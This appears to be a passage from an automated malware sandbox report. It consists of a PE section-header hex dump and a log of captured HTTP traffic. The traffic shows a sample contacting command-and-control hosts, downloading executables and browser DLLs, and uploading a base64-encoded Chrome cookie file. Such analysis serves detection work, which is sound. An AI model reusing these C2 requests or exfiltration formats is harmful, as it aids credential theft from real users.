2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000354001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 42 37 33 34 37 33 30 34 41 30 32 37 34 30 37 32 35 36 30 38 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 2d 2d 0d 0a Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="hwid"B6B7347304A02740725608------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="build"save------BGCAAFHIEBKJKEBFIEHD--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBAHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 34 39 33 64 32 33 64 33 38 32 63 63 63 37 35 33 61 63 37 64 61 34 65 35 66 63 34 33 36 35 31 61 65 34 38 61 61 63 35 66 65 63 61 64 35 61 63 38 38 31 32 33 65 33 64 38 62 32 61 62 31 34 37 32 34 61 37 65 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 2d 2d 0d 0a Data Ascii: ------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="token"399493d23d382ccc753ac7da4e5fc43651ae48aac5fecad5ac88123e3d8b2ab14724a7e1------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="message"browsers------JDHIEBFHCAKEHIDGHCBA--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAEBGCAAECAKFHIIJDBHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 34 39 33 64 32 33 64 33 38 32 63 63 63 37 35 33 61 63 37 64 61 34 65 35 66 63 34 33 36 35 31 61 65 34 38 61 61 63 35 66 65 63 61 64 35 61 63 38 38 31 32 33 65 33 64 38 62 32 61 62 31 34 37 32 34 61 37 65 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="token"399493d23d382ccc753ac7da4e5fc43651ae48aac5fecad5ac88123e3d8b2ab14724a7e1------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="message"plugins------IDAEBGCAAECAKFHIIJDB--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFBHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 34 39 33 64 32 33 64 33 38 32 63 63 63 37 35 33 61 63 37 64 61 34 65 35 66 63 34 33 36 35 31 61 65 34 38 61 61 63 35 66 65 63 61 64 35 61 63 38 38 31 32 33 65 33 64 38 62 32 61 62 31 34 37 32 34 61 37 65 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="token"399493d23d382ccc753ac7da4e5fc43651ae48aac5fecad5ac88123e3d8b2ab14724a7e1------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="message"fplugins------GDBFBFCBFBKECAAKJKFB--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFIJEBFCGDAAKFHIDBFHost: 185.215.113.37Content-Length: 7451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000355001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDBHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 34 39 33 64 32 33 64 33 38 32 63 63 63 37 35 33 61 63 37 64 61 34 65 35 66 63 34 33 36 35 31 61 65 34 38 61 61 63 35 66 65 63 61 64 35 61 63 38 38 31 32 33 65 33 64 38 62 32 61 62 31 34 37 32 34 61 37 65 31 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="token"399493d23d382ccc753ac7da4e5fc43651ae48aac5fecad5ac88123e3d8b2ab14724a7e1------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFCHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 34 39 33 64 32 33 64 33 38 32 63 63 63 37 35 33 61 63 37 64 61 34 65 35 66 63 34 33 36 35 31 61 65 34 38 61 61 63 35 66 65 63 61 64 35 61 63 38 38 31 32 33 65 33 64 38 62 32 61 62 31 34 37 32 34 61 37 65 31 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 2d 2d 0d 0a Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"399493d23d382ccc753ac7da4e5fc43651ae48aac5fecad5ac88123e3d8b2ab14724a7e1------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="file"------BGDAAKJJDAAKFHJKJKFC--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAEHDBAAECBFHJKFCFBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 34 39 33 64 32 33 64 33 38 32 63 63 63 37 35 33 61 63 37 64 61 34 65 35 66 63 34 33 36 35 31 61 65 34 38 61 61 63 35 66 65 63 61 64 35 61 63 38 38 31 32 33 65 33 64 38 62 32 61 62 31 34 37 32 34 61 37 65 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 2d 2d 0d 0a Data Ascii: ------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="token"399493d23d382ccc753ac7da4e5fc43651ae48aac5fecad5ac88123e3d8b2ab14724a7e1------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="file"------GCAEHDBAAECBFHJKFCFB--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 46 41 32 34 35 43 39 46 32 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFFA245C9F2FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
